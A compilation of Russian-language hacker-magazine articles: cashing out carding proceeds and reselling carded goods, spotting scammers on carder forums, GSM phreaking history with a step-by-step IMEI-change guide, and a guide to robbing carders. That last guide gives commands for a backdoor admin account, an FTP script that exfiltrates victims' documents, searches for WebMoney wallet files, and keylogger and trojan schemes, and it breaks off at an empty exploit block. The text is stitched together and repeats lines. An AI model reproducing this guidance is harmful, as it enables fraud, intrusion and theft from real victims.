Допустим, все прошло успешно, и ты работаешь уже месяц. Естественно, пора подумать о том, как забрать свои деньги, пока не пошли чарджбэки. Если твой партнер высылает деньги на WebMoney или E-Gold, то все очень просто – достаточно зарегистрировать аккаунт в нужной системе и перечислять туда деньги. Как обналичить Webmoney, я думаю, все знают, об этом подробно написано на их сайте. В случае с E-Gold пугаться тоже не стоит. В интернете много контор, занимающихся обменом – о них ты прочитаешь в статье «8 хитрых способов обнала денег с кред».
Сложнее, если тебе будут перечислять сумму посредством банковского перевода. Хотя вся сложность состоит в том, что придется найти нальщика. Как всегда, найти его можно на кардерских форумах. Нальщик возьмет с тебя процент (какой именно - ты договоришься с ним). Также придется договориться и о том, как тебе удобнее будет получить деньги. Надо сказать, что обналичивание денег - один из самых главных моментов. Прежде чем обращаться к нальщику, стоит посмотреть его рекомендации. Если нальщик хороший, то люди, работавшие с ним, обязательно оставят о нем отзывы. Тут может возникнуть проблема: обычно нальщику, особенно если он профи, не очень выгодно работать с суммами меньше $1000. Поэтому меньшую сумму он может и не принять. В этом случае можно действовать по-разному: можно все же уговорить его принять $500, а можно просто подкопить еще денег на счету.
Кстати, с нальщиком лучше договориться заранее, еще до подключения к партнерской программе. Дело в том, что счет, на который будут идти твои деньги, возможно, придется указывать во время регистрации. Лучше, если все будет готово заранее. Это избавит от непредвиденных сюрпризов.
Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый. Большинство прибалтийских банков могут открыть счет без личного визита к ним. Для этого тебе понадобятся ксерокопии некоторых документов (каких именно - зависит от банка). После чего их надо послать по почте или по факсу. Если все пройдет удачно, то ты получишь конверт, в котором будет дебетная карта (Visa Electron или Cirrus/Maestro) с пин-кодом, а также инструкции для онлайнового управления счетом. Такой счет будет очень полезен и в дальнейшем. Он обязательно окупится, если, конечно, не запороть его после первого же перевода. Кроме того, теперь уже не придется отдавать проценты нальщику, и появится возможность обналичивать суммы меньше $1000.
В правилах партнера необходимо внимательно прочитать, в какие страны он может делать переводы. Если этого нет в правилах, придется написать письмо в службу поддержки и спросить об этом. Может оказаться, что они переводят деньги только в пределах США или другой страны.
В общем, для обналичивания денег нужно:
- Иметь счет для обнала (свой или предоставленный нальщиком).
- Иметь необходимую сумму на счету у партнера.
- Превысить первоначальный холд (если он есть).
Одним выстрелом двух зайцев
Если все было сделано правильно, то уже через месяц-полтора в твоем кармане осядет некоторая сумма денег. Как долго будет работать проект - зависит только от тебя и от жадности кардхолдеров. За месяц проект может легко окупиться, плюс принести некоторую прибыль. Дальше все деньги будут идти уже тебе в карман. Но, как всегда, денег хочется больше. И это, в принципе, не проблема.
Допустим, ты рекламируешь хостинг своего партнера. А зачем выбрасывать на помойку честно накарженный товар? Куда более разумным решением будет продать этот хостинг, например, в два раза дешевле. Попробуй найти людей, которым он будет нужен. Если продавать его на кардерских форумах, то лучше сразу предупредить покупателя, что товар скаржен, чтобы избежать дальнейших разборок. Лучше будут продаваться темплейты, т.к. они уже есть и их не закроют, как, например, хостинг. Самое выгодное - это, как я говорил, dedicated servers. Их можно использовать и в своих целях.
И в заключение...
Я постарался показать, что кардинг - это все же творческий процесс. Главное верить в свои силы, и тогда все должно получиться. Сначала все кажется очень сложным, но если потратить немного времени, то картина быстро проясняется. Конечно, на пути тебя будут подстерегать неожиданности, но рассказать обо всех невозможно. Связанно это с тем, что многое меняется очень быстро, да и в каждой компании свои правила и порядки. Думаю, многие меня осудят, сказав, что кардинг - это противозаконно и аморально. Совершенно с этим согласен, поэтому никого не призываю заниматься чем-то подобным.
Список сайтов, на которых можно найти много полезного для начинающего кардера
carder.market
CSU
Ver
Но не кидайся на первый попавшийся сайт, сначала пройдись по разным компаниям и изучи их условия.
Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты будут немаленькие.
Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть всего того, что в народе называют попсой.
Тебе понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс.
Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый.
Основу проблемы <кидков> создают доверчивые люди которых обманывают, ведь в 90% случаев обмана человек переводит деньги или оказывает услуги <вперёд> , основная масса кинутых в кардинге и в других сферах - новички , которые либо не до конца разбираются в том чем занимаются, что даёт кидале дополнительный шанс обмануть жертву, сыпя терминами, либо слишком доверчивы, так что если вас обманули в большинстве случаев можете записывать себя в ряды новичков или доверчивых. Ещё запомните фразу <скупой платит дважды> в контексте кидал она как никогда актуальна.
Как становятся кидалами или с чего начинается обман:
В своём большинстве кидалами становятся те кто не смог достичь каких-либо успехов в том чем занимается он и его окружение.
В итоге человек разочаровавшись видит что другие зарабатывают что-то а он ничего не получает. Сразу на ум приходит мысль - <а почему бы не взять у своих> . Чаще всего кидалы получаются из тех кто купил енролл, попробовал заняться вещевухой, у него ничего не вышло но енролл ещё не сдох и он берёт на каком-то форуме постит <продаю енролл mbna>, к нему стучится пару человек и он ВСЕМ им продаёт этот енролл. Вроде обмана как такового нет - все получили то что хотели (фактор продажи товара в несколько рук мы не рассматриваем) однако с очень большой вероятностью никто из купивших рол ничего не добьется и примкнёт к стае <обиженных и угнетённых>, это первая стадия.
Дальше он вспомнив ход сделок , опять запостит <продаю енролл сити> (так как он дороже) к нему постучит 10 человек из которых 7 нормальных а 3 новичка , 7 не захотят с ним работать так как он не даст логин и пароль вперёд (у него их нет) а трое возьмут да и купят, переведя wmz. Вывод - кидала почувствует деньги и навсегда останется мошенником , даже в дальнейших возможно честных сделках первая мысль у него будет <а как же мне обмануть>.
Признаки обмана и кидалы:
кидала хочет получить деньги быстрее и ему все равно на исход сделки так как при <удачном> раскладе он все равно останется в плюсе , так что первая характерная черта кидал - спешка, они придумывают кучу побочных факторов провоцирующих ускорение сделки: беременная жена , блокировка кошелька , беспокойство дропа итак далее, таких <подмазок> можно придумать кучу.
Кидала хочет показать себя шарящим человеком поэтому постоянно употребляет не в меру большое количество терминов / спецефических слов.
Как крутой кардер кидала <живёт в юса> и он <бомж у которого нет денег на русскую клавиатуру>, посему он пишет транслитом, но иногда (при длительном общении) проскакивают фразы на русском. Стандартным ответом если его напрячь по данному вопросу (теоретически) будет <я общаюсь с нерускоговорящими партнёрами> , однако сам он ни на английском ни на китайском ни 1 слова не знает (это легко проверить стукнув ему с другой аси).
Кидала пишет по исключительно на английском - первый напрашивающийся вывод - <он иностранец и на русском не муму> такой вывод обычно сразу повышает уровень доверия. Так же факт незнания языка, грамматические ошибки и постоянных смайлы или знаки вырывающихся эмоций. По типу "ой как чешутся руки, и ещё чуть-чуть и я его обману и кину". В большинстве случаев это либо реальные олени/домохозяйки которые на русском не говорят либо как чаще и бывает наши соотечественники - кидалы. Проверить это довольно просто, как и в вышеописанном пункте стукнуть с другой аси , основные варианты стука: предложить ему то от чего он не сможет отказаться, постучать от имени <Маши> у которой заполнена вся инфа в асе и которая хочет познакомиться, чаще всего кидала клюнет.
Ник кидалы. Жадность и несдержанность частенько проявляются в никах которые меняются как перчатки, но как только видим Экспресс, Фаст, Изи и так далее, да еще в придачу с словом бабло, кэш, капуста уже стоит быть осторожным и собственно говоря начинать проверять человека.
Номер icq или jabber кидалы. Сейчас шестизначные номера аси не является признаком <крутости>, поэтому судить по номеру нельзя. Аналогично с датой регистрации на форуме - пример тому <лука> с cw по этому признаку тоже судить нельзя.
Количество постов кидалы - у потенциального кидалы либо слишком маленькое относительно даты регистрации, либо наоборот сильно большое (набивает посты). Перед сделкой с ним, рекомендуется почитать что человек пишет на форумах, и оценить его адекватность , если это тупой набой постов то вывод делайте сами.
Неадекватное поведение/разговор - говорит много не по делу , говорит много о другом деле , хочет сразу с тобой заняться многим , корешится. Так же кидалы очень любят орать что-то типа "да ты кидала?! решил меня кинуть?" как говориться меряют людей по-себе.
Фразы в духе <я на форумах особо не тусуюсь , работаю на заказ итд> такое бывает но редко. Желание работать сразу на большие суммы без предварительной проверки и спешка мол закроется ВЮ офис или отмазки что "тестовыми заливами спалишь дропа" тоже в принципе свидетельствует о том что надо быть осторожным.
Очень много кидал начали делать посты и в конце приписывать, работаю только через гаранта, но когда заходит разговор о сделке появляется куча отмазок и отговорок иногда даже звонки с целью запудрить мозг.
Вывод: ни 1 из перечисленных выше факторов не может говорить о том что чел кидала но в совокупности они дают знать что с ним лучше не иметь дел, общая тактика кидалы - запудрить жертве мозг.
Как проводить сделки:
С непроверенными людьми исключительно через гаранта не пожалейте 10-20$ даже если товар столько и стоит. Если вас кинут - у вас останется негативное впечатление и деньги попадут мошеннику в руки, что как было описано выше скорее всего подвигнет его к новым обманам, а если вы заплатите гаранту и проведёте сделку успешно то у вас будет <проверенный> (не факт что он не кинет вас в последствии на более крупную сумму) селлер и гарант получит свои честно заработанные деньги которые в большинстве случаев пойдут на развитие форумов - все будут рады.
В случае работы без гаранта, работайте только с известными людьми либо только при наличии положительных отзывов (от проверенных участников , чтоб избежать факта самоотписа отзывов). как правило новичкам в этой ситуации приходиться тяжело, особо ничего нет показать, материалы достали и хочется продать, в общем такой замкнутый круг и к сожалению очень много способных начинающих ребят оказывается или обмануты или с ними просто ни кто не хочет работать, в принципе чтобы избежать подобной судьбы советуем начинать потихоньку и без особых понтов.
Если не уверены в человеке - не стоит мучить его, навязывая ему свои хитрые условия сделки, ищите другого. Так как этим вы у нормального человека сложите о себе мнение тормоза, а кидале не дадите вас кинуть тем самым потратив своё и чужое время.
Да в принципе вариантов тут остается маловато.
Или делайте сделки через гарантов или с проверенными людьми, варианты мол дам своего гаранта тоже очень часто могут оказаться обманом.
Вариант 50 сейчас 50 потом работает более-менее гладко, хотя если человек не кидала то дать все 100 вперёд не проблема.
Для уточнения кем является человек , особенно стучащий вам , обязательно просите его отправить вам PM на форуме.
Сегодня, да, в общем-то, как и всегда, все хотят халявы. Это слово прижилось в сознании русского народа. Каждый хочет бесплатного проезда в метро, бесплатной автостоянки возле магазина рядом с домом, бесплатного туалета, даже бесплатных пакетов в супермаркете. Сотовая связь не исключение. Только сейчас на рынке мобильной связи эта проблема теряет актуальность, а в начале девяностых она была весьма насущной. В наши дни никто не будет тратить на сотовую связь 20-30 баксов в день - легче купить безлимитный тариф, а лет десять назад такой тариф в год обходился в стоимость нового автомобиля бизнес-класса.
А народ хотел дешевле…
Народ хотел дешевле, а операторы не снижали цены в силу многих причин - за что и расплачивались в буквальном смысле. Именно в то время начали появляться так называемые фрикеры - телефонные пираты. Многие думают, что если сосед дядя Вася с седьмого этажа поменял прошивку на своем сотовом телефоне, то он автоматически стал фрикером. Нет. Настоящие фрикеры были специалистами своего дела – в то время их было очень мало, а сейчас практически нет. Это выпускники МИФИ, МВТУ имени Баумана и других сильных вузов, где программирование, высшая математика и радиоэлектроника стоят не на последних местах в списке изучаемых дисциплин. Они делали связь бесплатной, чем привлекали внимание общественности и соответствующих силовых структур. Именно тогда было создано небезызвестное Управление «Р», занимающееся преступлениями в сфере высоких технологий. Сейчас такие фрикеры не востребованы, потому что их работа не окупается, а в начале девяностых они легко зарабатывали в день сумму с четырьмя нулями и далеко не российских рублей. Именно те девяностые ознаменовались спадом российской экономики, тогда деньги валялись на земле – их нужно было только поднять, и фрикеры поднимали.
Отпустите меня в Гималаи
Все начиналось с пресловутых телефонов «Алтай», с которых звонили родственникам в Америку. Причем бесплатно и много, за счет людей, к которым нелегально подключались. Потом все перешло на сотовые. С ними, однако, все сложнее – ведь в мобильном телефоне есть SIM-карта, которую определяет базовая станция и регистрирует в сети по ее номеру – а не по номеру сотового. Безусловно, я имею в виду стандарт GSM. Этот номер и вся другая важная информация (PIN, PUK и пр.) закодирована на SIM-карте 128-битовым ключом. Самая большая проблема была в том, чтобы подобрать этот ужасно-много-битовый ключ. Сделать это в домашних условиях можно только банальным перебором. И именно этим занимались настоящие фрикеры. Но об этом чуть позже, а пока я расскажу тебе необходимый минимум теории.
Вообще, вся зона охвата территории оператором делится на относительно маленькие соты (их диаметр - в среднем 5 километров). В городе, как правило, это расстояние – метров 600, за городом – около четырех километров. Как только абонент переходит с включенным телефоном из одной соты в другую, его регистрирует базовая станция той соты, на которой он в данный момент находится. Расстояние до ближайшей базовой станции определяется элементарно. Во многих аппаратах эта уникальная опция скрыта, ее просто нужно найти. Мобильный телефон определяется по-другому: у каждого аппарата есть пятнадцатизначный серийный номер – IMEI. Первые четырнадцать цифр этого номера фиксировано устанавливаются при прошивке, пятнадцатая генерируется псевдослучайно. У всех телефонов IMEI изначально разный; к определению и регистрации в сети он никакого отношения не имеет. Он нужен для того, чтобы узнать владельца аппарата, если это необходимо. Но это намного более трудоемкое и неблагодарное занятие, чем определение местоположения активной в данный момент SIM-карты. Серийный номер мобильного телефона говорит о многом. По нему можно узнать номер партии, к которой принадлежит данный телефон. А по номеру партии - «серый» этот сотовый или нет.
SIMEdit и RS-232
Много ходило и ходит легенд о перепрошивке SIM-карты. Некоторые из этих легенд никакого отношения к самой перепрошивке не имеют. Перепрошивка, или клонирование, SIM-карты, на самом деле нетрудоемкий процесс, но он требует больших материальных затрат, прямых рук, светлой головы и большого количества свободного времени. Очень часто я слышал рассказы о том, что люди создавали образ симки, имея в руках только комплекты PIN и PUK-кодов от этой самой SIM-карты, а потом с помощью кабеля RS-232 запросто перепрошивали ее в самом телефоне. Это бред. На данный момент я не знаю человека, который смог бы перепрошить SIM-карту удаленно, и, наверное, не узнаю никогда.
Также упоминалась программа SIMEdit, которая может «абсолютно» все, на поверку оказавшаяся обычным редактором телефонной книги, деревянным и не бесплатным. Узнать тот самый 128-битовый ключ SIM-карты можно только с помощью мощнейшего криптоанализатора (стоимость которого заоблачна для среднестатистического пользователя), и не меньше чем за 10 часов. Есть еще одно «но»: за эти десять, а может, и больше часов идет сильнейшая нагрузка на SIM, и некоторые экземпляры карточек этого не выдерживают и сгорают.
Жаркая весна сорок пятого
Иными словами, при себе, минимум на полдня, нужно иметь SIM-карту товарища, которая обязана выжить, потому что ей еще предстоит работать. Но фрикеров такие нюансы не останавливали, а даже наоборот – вдохновляли. Они находили симки, делали их образы и выкидывали сотни сгоревших. Телефонных хакеров не останавливало даже то, что с перепрошитой карты можно только делать звонки, а не принимать их. В то время минута, по теперешним меркам, стоила очень дорого, и этот бизнес того стоил.
В мае 2002 года в российских СМИ появилось заявление о том, что специалисты из компании IBM смогли взломать код SIM-карты с помощью только общедоступных электронных приборов за несколько минут. Т.е. любой дядя Вася, о котором я упоминал ранее, может с помощью одного паяльника за пять минут взламывать симки. Естественно, такой расклад не понравился никому. Сразу же после этого феноменального открытия (не факт, кстати, что оно было открытием – у нас тоже не дураки сидели), по технологии, предложенной IBM, к кодовой матрице была добавлена вспомогательная, беспорядочно сгенерированная, которая усиливала защиту SIM-карты на порядок и прикрывала обнаруженную дырку. К этому времени фрикерство постепенно изжило себя.
С телефонами же стандарта DAMPS, AMPS и пр. дела обстояли намного проще. Информация о сим-карте хранится у них в энергонезависимой памяти телефона – eeprom’е. Чтобы сделать «двойник» такого телефона, нужно всего лишь изменить IMEI, который, кстати, никак не зашифрован.
No pain, no game
Хакеров ловили и сажали. Их было немного, и поймать их было нетрудно. Им подсылали подставных лиц под видом покупателей, а потом брали с поличным. Намного больше было людей, которые пользовались левыми SIM-картами, и посадить их было сложнее. Им нечего было предъявить. А Управлению «Р» надо было повышать раскрываемость телефонных преступлений, потому что заявлений приходила уйма. Операторы сами пытались бороться с хакерами. Множество людей обращались в центральные офисы с вопросом: «А откуда у меня в распечатках счетов такие огромные суммы и непонятные телефонные номера?» Абоненту вдвойне компенсировали украденную сумму, просили вычеркнуть свои телефоны и начинали работать с оставшимися. По этим номерам пытались выйти на «двойников», но результатов, естественно, эти оперативно-розыскные мероприятия не давали. Так было в самом начале, сейчас же такие проблемы могут возникнуть из-за неточности систем биллинга. Но до сих пор для меня остается загадкой, почему операторам это всегда идет в плюс
.Пионер всегда готов, как Гагарин и Титов
Но шло время, поднимать деньги с пола стало намного сложнее, особенно сидя. Нужно было искать более законные методы. Законные в том смысле, чтобы в Уголовном кодексе не было по этому поводу законов. На рынок связи пришла новая волна фрикеров, которых фрикерами-то не назовешь. Их стало очень много. Они просто умели тупо производить разлочку сотовых телефонов и последующую их русификацию, нажимая клавиши на клавиатуре в определенном порядке. У них не было никакого багажа знаний, о том, как это делать, им рассказали умные люди, которые, в большинстве своем, шлифовали к тому времени нары.
Чуть раньше разлочить телефон стоило дорого: в розницу порядка 40-50 американских президентов. Аппараты стоили в России намного дороже, чем на Западе. Их оттуда и везли. Здесь телефоны перепрошивали под наши сети. Именно в то время появилось понятие «серый» телефон. Сейчас «серых» практически нет, правда, иногда в Москве можно увидеть крупные партии. Но не тогдашнего масштаба, когда только в офисах операторов продавали сертифицированное оборудование. Тут пришло и много зеленых фрикеров, и цены стали обвально падать: буквально до двух-трех долларов за штуку. Каждый хотел урвать свой кусок, и нерезиновый пирог пришлось поделить на огромное количество человек. Тогда для тех, кто был не в курсе (а их было подавляющее большинство), разлочка телефона стояла на одном уровне сложности с перепрошивкой SIM-карты. Они были практически правы, но этот уровень для них был самым последним. Когда гражданин узнавал, что «тот вон парень в рыжей футболке перепрошивает телефоны», он сразу проникался глубоким уважением к этому человеку.
Серийные номера
Используя информацию о мобильниках, которая на данный момент лежит в интернете, можно практически с любым телефоном вытворять что угодно. Можно заблокировать сотовый на сеть, на отдельную SIM-карту, снять с телефона код блокировки, изменить IMEI и много чего другого. Кстати, про IMEI. Однажды с моей знакомой приключилась неприятная история. В институте у нее украли телефон, и она обратилась в офис оператора с вопросом о возможности возврата ей ее сотового. Оператор сказал, что это не вопрос. Он объяснил, что нужно только подать заявление в милицию, и он (оператор) сам по серийному номеру телефона найдет аппарат, ведь каждый номер уникален. Они ей совершенно серьезно сказали, что IMEI изменить невозможно, когда я буквально за несколько часов до этого менял первые одиннадцать цифр серийного номера мобильного на номер своего сотового телефона в международном формате. Именно поэтому в самом начале я сказал, что IMEI разный у всех телефонов только изначально, на этапе их выпуска с конвейера.
Потом можно найти телефон с таким же серийным номером, как у твоего, причем не один. Возникает предположение, что операторы сотовой связи просто делают вид, что они не в курсе.
Flash, eeprom и другие страшные слова
Как я уже говорил, разлочить телефон просто, так же просто, как и достать для этого программное обеспечение. Чтобы заставить сотовый работать в необходимом качестве, нужно изменить его память, т.е. перепрошить ее. Я говорю про flash-память телефона. Только не про тот flash, который ты засовываешь в цифровой фотоаппарат или mp3-плеер, и не про тот, который ты наблюдаешь в интернете. Телефонный flash – это практически то же, что и операционная система компьютера. Это все телефонное меню, игры, калькулятор, диктофон и пр. Эта память - как матрешка, которая продается на Старом Арбате. Самая большая – flash, в нее входит eeprom, который значительно меньше. В eeprom’е записана вся информация по кодам блокировки телефона, настройкам аппарата и другим нужным штуковинам. И самая последняя – память, содержащая IMEI и дату выпуска телефона – она, в свою очередь, является частью eeprom’а. Для русификации телефона производятся изменения во всем flash’е, для разлочки телефона или смены серийного номера – в eeprom’е. Flash в среднем весит 14 мегабайт, eeprom – 53 килобайта, поэтому для разлочки телефона легче из аппарата выкачивать именно eeprom, и с ним уже работать дальше. Единственный нюанс – проверка контрольной суммы. Если во flash’е стереть что-то нужное или добавить лишнее, телефон в лучшем случае откажется работать.
Универсальная программа
Нужно было найти софт, который бы выкачивал flash из телефона, а потом закачивал его обратно. Раньше эти программы были страшным секретом, многие даже не знали, как они называются, некоторые делали их самостоятельно, но от этого суть не менялась. Сейчас я расскажу про программу для работы с телефонами марки Siemens. Ребятам-разработчикам этой программы поставили памятник при жизни. Эта штуковина называется Unisiemens, достать ее можно в любом месте Интернета, и она проста в применении. С ее помощью можно скачать и flash, и eeprom, и даже кусок flash’а с определенного адреса, а потом залить это все обратно.
Есть два способа разлочить телефон. Самый простой способ: скачать из такого же, но не незалоченного, телефона eeprom и залить его на залоченный. Самый сложный способ: слить eeprom из залоченного телефона – он будет представлять собой обычный бинарник, и разбираться с ним в шестнадцатиричном редакторе. Я в свое время выбрал HexEditor – он до сих пор лежит у меня на почетном месте. Выбор за тобой. Практически так же меняется IMEI телефона, правда для этого существуют немного другие программы, но в интернете их тоже достать несложно, а пользоваться еще легче.
У меня самый первый разлоченный телефон был мой собственный. Я его заблокировал, а потом перепрошил. Я очень за него боялся – он стоил больше трехсот баксов, а другой я покупать не хотел. Но все прошло нормально. И после этого я уже не боялся ничего
.И снится нам не рокот космодрома…
Но фрикеры занимались не только разлочкой аппаратов и дублированием SIM-карт. В то время существовали возможности прослушивания разговоров по мобильным телефонам. Оборудование стоило порядка пятидесяти-ста тысяч долларов. Главное, чтобы были заказы, правда, за абонентами нужно было бегать в пределах одной соты. Шифровка тогдашнего GSM’а, которой, к слову сказать, почти и не было, на несколько порядков была слабее шифровки GSM’а сегодняшнего. Раньше операторы не задумывались о возможности таких случаев, пока не посадили пару «шпионов». Теперь же сотовая связь практически безопасна: даже операторы сами не могут слушать абонентов. Но бывает, что операторы снимают шифрование с сети. Наверное, все помнят недавний теракт в Тушино во время праздника Крылья. В тот день на территории аэродрома, где проходил праздник, до вечера были отключены все базовые станции. Иными словами, образовался информационный колпак, блокирующий услуги всех московских операторов сотовой связи. Буквально в следующие дни по всей Москве по приказу правительства была отключена шифровка разговоров на всех сотовых телефонах стандарта GSM. Тогда абоненты на три дня смогли почувствовать себя в девяносто третьем.
А сейчас…
Сейчас, в силу причин, о которых я рассказал выше, телефонный фрик стал историей. Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия. Те фрикеры знали, что только на первом этапе появления сотовой связи в России можно зарабатывать большие деньги. Они знали, что такие времена быстро пройдут. И те, кто был хитрее, отхватили больше всех и ни о чем потом не жалели. По крайней мере, на хлеб с икрой им хватало вполне.
Теперь прошли времена телефонов размером с двухкассетный видеомагнитофон, а цена минуты разговора с пяти американских долларов скатилась до SMS за один американский цент. Уже давно никто не перепрошивает SIM-карты, зато на Митино непонятно откуда берутся номера карточек предоплаты, написанные в столбиках на листах бумаги. Но это уже информационный фрик, который прочно занимает место телефонного.
Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия.
Я думаю, тебе не терпится что-нибудь сделать со своим телефоном, а разбираться с flash’ом вручную неохота. По глазам вижу и понимаю. Наверное, тебе уже хочется поменять несколько чисел серийного номера телефона на год своего рождения. Сегодня я предоставлю тебе эту уникальную возможность. Раз уж мы в статье упоминали про Siemens, то с ним и будем работать. Приготовься стать настоящим фрикером.
Приготовился? Поехали. Для того чтобы изменить IMEI своего телефона, нужно:
- Включить компьютер.
- Иметь в руках сотовый телефон и кабель RS-232, подключенный к компьютеру.
- Установить с диска, прилагающегося к журналу, программу Siemens Unlock.
- Запустить программу и выбрать модель своего сотового.
- Зайти Сервис > Разблокировать/Сменить IMEI.
- Ввести желаемый IMEI и нажать кнопку сменить.
Как ты уже заметил, функции программы на этом не ограничиваются. Надеюсь, намек понят
. И напоследок: если тебе это все очень интересно, зайди на ftp://vts.vlad.ru/pub/. Ты обязательно найдешь там что-нибудь для своего телефона.Как обчищают богачей
Все люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуале. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, продает кредитки, покупает различные вещи... и в какой-то момент все теряет. Из-за собственной невнимательности его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, казалось бы, защищенных кардеров? Давай попробуем разобраться.
Укротим систему!
Способов украсть ценную информацию и сбережения кардера очень много. Но стоит оговориться, что в этом деле главное не количество, а качество, то есть успешное применение этих способов.
Итак, самое время рассказать, как же хакер может украсть данные у жертвы. Во-первых, это взлом компьютера богатого буратино
. Здесь - как повезет, ничего нельзя сказать наверняка. Если человек - раззява и не читает багтраки, то шансы хакера резко возрастают. В противном случае, да еще и с установленным на машине фаерволом, этот способ непригоден.Как же ломают рабочие станции пользователей? Тут также существуют свои способы. Остановимся на бажной WinNT. Ты всегда думал, что если винда имеет префикс NT, то у нее стопроцентная защита? Я тебя разочарую. В таких платформах были найдены очень опасные баги.
RPC-эпидемия
Если ты не знаешь об RPC-уязвимости, то у тебя позднее зажигание
. Об этой ошибке трубили все порталы по безопасности, а также было выпущено множество эксплоитов, в том числе и для Windows (рай для скрипткидисов). Как же хакер может поиметь бабла с наивного буржуя, который, наверное, и не знает о существовании патча от RPC-баги? Очень просто. Достаточно завладеть доступом к его системе и набрать ряд консольных команд. После этого все важные документы будут находиться в лапах злоумышленника.Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
Чтобы не использовать шумный эксплоит (который, кстати, может разрушить RPC-вызовы и привести систему к краху) каждый раз, можно создать аккаунт администратора. Его, как известно, пустят на такие ресурсы, как C$, D$ и прочие. Это сделать очень легко. Достаточно лишь набрать следующие строки:
net user admin nimda /add (добавляем нового пользователя admin с паролем nimda, параметры можно подставить свои).
net localgroup Administrators admin /add (присвоим пользователю группу Administratots).
В случае, когда локализация платформы не английская, необходимо подставить название группы на родном языке. Для этого хакер набирает "net user" и узнает истинное название группы.
Если все было сделано верно (команда net обязательно сообщит хакеру о результате операции), взломщик может зайти на машину с локального компа. В этом ему помогает команда "net use z: \\IP-ADDRESS\C$". Но он этого никогда не сделает по одной простой причине - на машине ведутся логии, и его IP-адрес обязательно будет записан. Но выход есть - хакер заходит не с себя, а со своего любимого скарженного шелла.
Code:
smbclient //IP-ADDRESS/$C -U adminЭта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).
Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.
Кто ищет, тот всегда найдет
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file". Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:
Пример FTP-сценария
Code:
user vasya vasya123
type binary
put document.doc /xakep/document.doc
quitПосле составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.
Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:
Code:
dir /S c:\ | find *.?wmПри этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.
WebMoney - радость кардера
После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.
Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса - отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.
Вообще, есть еще один метод завладения WM-кошельком. Он практикуется среди богатых, но ламернутых личностей, которые недавно, но успешно постигают кардерские махинации. Создается программа, типа "крякера интернета", но она не крякает интернет, а уводит кошельки WebMoney. Реализовать ее - пара пустяков, проблема в другом - впарить прогу жертве. Это может сделать хороший хакер, имеющий богатый опыт в социальной инженерии.
Исходный код этой небольшой программы ты найдешь во врезке. Полный исходник проекта есть на диске.
Помимо самой службы WebMoney, есть сервис Merchant (http://merchant.webmoney.ru), который нужен для проведения онлайн-операций по переводу денег с одного WM-кошелька на другой. Обычно сервис применяется в различных проектах, например, интернет-магазинах. Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney. При этом клиент будет пересылать деньги на счет злоумышленника. Бесспорно, это скоро будет замечено, но взломщик успеет обогатиться.
Бреши в ослике
RPC-уязвимость далеко не единственная бага в форточках. Рассмотрим еще один пример - ошибка в обработке тега <OBJECT>, позволяющая выполнять произвольный код на машине клиента. Реализовав такую уязвимость, хакеру ничего не стоит залить троян на жертву, да еще и записать в лог его IP-адрес, который впоследствии будет проверен на заражение бэкдором
.Для написания эксплоита достаточно создать следующий html-документ:
Code:
